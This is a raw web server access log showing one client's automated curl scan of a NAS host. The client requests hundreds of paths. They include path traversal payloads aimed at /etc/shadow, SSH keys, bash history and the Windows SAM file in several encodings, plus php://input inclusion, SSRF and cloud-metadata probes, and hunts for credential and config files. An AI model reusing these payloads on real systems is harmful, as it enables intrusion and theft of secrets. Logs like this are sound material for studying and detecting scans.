[Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:28 +0000] - 404 404 - GET https nas.profibot.hu "/etc/mail.rc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:28 +0000] - 404 404 - GET https nas.profibot.hu "/mailfilter/settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:28 +0000] - 403 403 - GET https nas.profibot.hu "/.svn/README.txt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - 404 404 - GET https nas.profibot.hu "/params.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - 403 403 - GET https nas.profibot.hu "/.htaccess" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - 404 404 - GET https nas.profibot.hu "/employee/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - - 403 - GET https nas.profibot.hu "/?theme=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - 404 404 - GET https nas.profibot.hu "/mail.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - - 403 - GET https nas.profibot.hu "/?source=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - 404 404 - GET https nas.profibot.hu "/suitecrm/config_override.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - 404 404 - GET https nas.profibot.hu "/processwire/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - 404 404 - GET https nas.profibot.hu "/paypal.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - 404 404 - GET https nas.profibot.hu "/api/cart-handler.ts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - 404 404 - GET https nas.profibot.hu "/license.txt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - 404 404 - GET https nas.profibot.hu "/cluster/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - 404 404 - GET https nas.profibot.hu "/api/system/status" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - 404 404 - GET https nas.profibot.hu "/sites/default/settings.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - 404 404 - GET https nas.profibot.hu "/erp/accounting/chart_of_accounts.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - 404 404 - GET https nas.profibot.hu "/addons/checkout_gateway/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - 404 404 - GET https nas.profibot.hu "/protractor.conf.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - 404 404 - GET https nas.profibot.hu "/hr/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - 404 404 - GET https nas.profibot.hu "/provider.tf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - 404 404 - GET https nas.profibot.hu "/tipjar/config.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - 404 404 - GET https nas.profibot.hu "/test-environment/payments/merchant_profile.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - 403 403 - GET https nas.profibot.hu "/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/system32/config/SAM" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - 404 404 - GET https nas.profibot.hu "/gatsby-config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - 404 404 - GET https nas.profibot.hu "/beta/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:29 +0000] - 404 404 - GET https nas.profibot.hu "/etc/nullmailer/adminaddr" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:30 +0000] - 404 404 - GET https nas.profibot.hu "/config/urls.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:30 +0000] - 403 403 - GET https nas.profibot.hu "/..%252f..%252f..%252f..%252f..%252f..%252fetc/hostname" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:30 +0000] - 404 404 - GET https nas.profibot.hu "/realtime/admin" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:30 +0000] - 404 404 - GET https nas.profibot.hu "/paypal-credentials.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:30 +0000] - - 403 - GET https nas.profibot.hu "/?config=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:30 +0000] - 403 403 - GET https nas.profibot.hu "/.semaphore/semaphore.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:30 +0000] - 403 403 - GET https nas.profibot.hu "/.svn/prop-base/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:30 +0000] - 404 404 - GET https nas.profibot.hu "/api/export?template=user" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:30 +0000] - 404 404 - GET https nas.profibot.hu "/bank_transfer/routing.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:30 +0000] - 404 404 - GET https nas.profibot.hu "/gradle.properties" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:30 +0000] - 404 404 - GET https nas.profibot.hu "/dbadmin" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:30 +0000] - 404 404 - GET https nas.profibot.hu "/backup.rar" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:30 +0000] - 404 404 - GET https nas.profibot.hu "/certs/privkey.pem" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:30 +0000] - 404 404 - GET https nas.profibot.hu "/pricing/tiers.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:30 +0000] - 404 404 - GET https nas.profibot.hu "/release.sh" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:30 +0000] - 404 404 - GET https nas.profibot.hu "/var/qmail/control/rcpthosts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:30 +0000] - 404 404 - GET https nas.profibot.hu "/:9090" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:30 +0000] - 404 404 - GET https nas.profibot.hu "/download/report?id=6" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:30 +0000] - 403 403 - GET https nas.profibot.hu "/.nuxt/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:30 +0000] - 404 404 - GET https nas.profibot.hu "/paypal/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:30 +0000] - 404 404 - GET https nas.profibot.hu "/checkoutcom/env.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:30 +0000] - 404 404 - GET https nas.profibot.hu "/config/queue.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:30 +0000] - 404 404 - GET https nas.profibot.hu "/latest/meta-data/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:30 +0000] - - 403 - GET https nas.profibot.hu "/?layout=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:31 +0000] - 404 404 - GET https nas.profibot.hu "/admin_panel" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:31 +0000] - 404 404 - GET https nas.profibot.hu "/admin.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:31 +0000] - 403 403 - GET https nas.profibot.hu "/..%5c..%5c..%5c..%5c..%5c..%5cvar/log/nginx/access.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:31 +0000] - 403 403 - GET https nas.profibot.hu "/..%252f..%252f..%252f..%252f..%252f..%252fproc/self/environ" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:31 +0000] - 404 404 - GET https nas.profibot.hu "/db/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:31 +0000] - 404 404 - GET https nas.profibot.hu "/plugins/system/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:31 +0000] - - 403 - GET https nas.profibot.hu "/?lang=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:31 +0000] - - 403 - GET https nas.profibot.hu "/?include=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:31 +0000] - 404 404 - GET https nas.profibot.hu "/etc/nullmailer/remotes" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:31 +0000] - 404 404 - GET https nas.profibot.hu "/report?file=quarter1.pdf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:31 +0000] - 404 404 - GET https nas.profibot.hu "/etc/default/postfix" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:31 +0000] - 403 403 - GET https nas.profibot.hu "/.svn/props/props" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:31 +0000] - 404 404 - GET https nas.profibot.hu "/vite.config.ts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:31 +0000] - - 403 - GET https nas.profibot.hu "/?page=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:31 +0000] - 404 404 - GET https nas.profibot.hu "/test/template" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:31 +0000] - 404 404 - GET https nas.profibot.hu "/events/payment_completed.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:31 +0000] - 404 404 - GET https nas.profibot.hu "/pipeline/training/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:31 +0000] - 403 403 - GET https nas.profibot.hu "/.env.dev" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:31 +0000] - 404 404 - GET https nas.profibot.hu "/quantum_jobs.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:31 +0000] - 404 404 - GET https nas.profibot.hu "/etc/exim4/update-exim4.conf.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:31 +0000] - 404 404 - GET https nas.profibot.hu "/setup_local.sh" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:31 +0000] - 404 404 - GET https nas.profibot.hu "/satellite/telemetry_config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:31 +0000] - 403 403 - GET https nas.profibot.hu "/..%252f..%252f..%252f..%252f..%252f..%252fwindows/system32/config/SAM" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:31 +0000] - 404 404 - GET https nas.profibot.hu "/bitdefender/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:32 +0000] - 404 404 - GET https nas.profibot.hu "/roundcube/config/config.inc.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:32 +0000] - 404 404 - GET https nas.profibot.hu "/error_log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:32 +0000] - 404 404 - GET https nas.profibot.hu "/etc/mail/smtpd.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:32 +0000] - 404 404 - GET https nas.profibot.hu "/api/test/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:32 +0000] - 200 200 - GET https nas.profibot.hu "/?file=php://input" [Client 185.177.72.49] [Length 2850] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:32 +0000] - 404 404 - GET https nas.profibot.hu "/etc/spf-policy.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:32 +0000] - 404 404 - GET https nas.profibot.hu "/index.php/dashboard/sitemap/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:32 +0000] - 404 404 - GET https nas.profibot.hu "/metadata/computeMetadata/v1/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:32 +0000] - 404 404 - GET https nas.profibot.hu "/firmware/config.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:32 +0000] - - 403 - GET https nas.profibot.hu "/?section=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:32 +0000] - - 403 - GET https nas.profibot.hu "/?dir=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:32 +0000] - 403 403 - GET https nas.profibot.hu "/.ruby-version" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:32 +0000] - - 403 - GET https nas.profibot.hu "/?document=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:32 +0000] - - 403 - GET https nas.profibot.hu "/?next=http://127.0.0.1:80" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:32 +0000] - 404 404 - GET https nas.profibot.hu "/onion/config.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:32 +0000] - 404 404 - GET https nas.profibot.hu "/storage/framework/cache/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:32 +0000] - 404 404 - GET https nas.profibot.hu "/shopify_settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:32 +0000] - - 403 - GET https nas.profibot.hu "/?read=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:32 +0000] - 404 404 - GET https nas.profibot.hu "/checkout/split_rules.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:32 +0000] - 404 404 - GET https nas.profibot.hu "/openbanking/api_config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:32 +0000] - 404 404 - GET https nas.profibot.hu "/charts/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - 404 404 - GET https nas.profibot.hu "/idp/saml_settings.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - - 403 - GET https nas.profibot.hu "/?module=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - 403 403 - GET https nas.profibot.hu "/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/php.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - 404 404 - GET https nas.profibot.hu "/game/auth_keys.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - 404 404 - GET https nas.profibot.hu "/etc/snort/snort.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - - 403 - GET https nas.profibot.hu "/?theme=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - 404 404 - GET https nas.profibot.hu "/update/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - - 403 - GET https nas.profibot.hu "/?asset=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - 404 404 - GET https nas.profibot.hu "/site-admin/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - 404 404 - GET https nas.profibot.hu "/chemistry/lab-config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - 404 404 - GET https nas.profibot.hu "/cloud/config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - 404 404 - GET https nas.profibot.hu "/zip/settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - 404 404 - GET https nas.profibot.hu "/sql_dump.tar.gz" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - 404 404 - GET https nas.profibot.hu "/config/database.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - - 403 - GET https nas.profibot.hu "/?document=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - 404 404 - GET https nas.profibot.hu "/fb-pixel.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - 404 404 - GET https nas.profibot.hu "/worker/mailer/settings.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - - 403 - GET https nas.profibot.hu "/?inc=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - 404 404 - GET https nas.profibot.hu "/config/paypal.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - 403 403 - GET https nas.profibot.hu "/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%afetc/hosts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - 404 404 - GET https nas.profibot.hu "/admin" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - 404 404 - GET https nas.profibot.hu "/var/log/apache2/access.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - 404 404 - GET https nas.profibot.hu "/core/lib/Drupal.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - 404 404 - GET https nas.profibot.hu "/wp-login.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:33 +0000] - 404 404 - GET https nas.profibot.hu "/saas/billing_config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:34 +0000] - 404 404 - GET https nas.profibot.hu "/admin?json_callback=alert" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:34 +0000] - 404 404 - GET https nas.profibot.hu "/currency_exchange/feeds.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:34 +0000] - - 403 - GET https nas.profibot.hu "/?callback=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:34 +0000] - 404 404 - GET https nas.profibot.hu "/app/entry.client.tsx" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:34 +0000] - - 403 - GET https nas.profibot.hu "/?template=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:34 +0000] - 404 404 - GET https nas.profibot.hu "/dist/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:34 +0000] - 404 404 - GET https nas.profibot.hu "/modloader/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:34 +0000] - 403 403 - GET https nas.profibot.hu "/.ssh/id_rsa.pub" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:34 +0000] - 404 404 - GET https nas.profibot.hu "/api/admins/2" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:34 +0000] - 404 404 - GET https nas.profibot.hu "/debug/vars" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:34 +0000] - 404 404 - GET https nas.profibot.hu "/graphql/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:34 +0000] - 404 404 - GET https nas.profibot.hu "/auth/check?jwt=" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:34 +0000] - 404 404 - GET https nas.profibot.hu "/archiver/mail_archive.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:34 +0000] - 403 403 - GET https nas.profibot.hu "/.svelte-kit/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:34 +0000] - 404 404 - GET https nas.profibot.hu "/config/binance.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:34 +0000] - 404 404 - GET https nas.profibot.hu "/admin/config.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:34 +0000] - 404 404 - GET https nas.profibot.hu 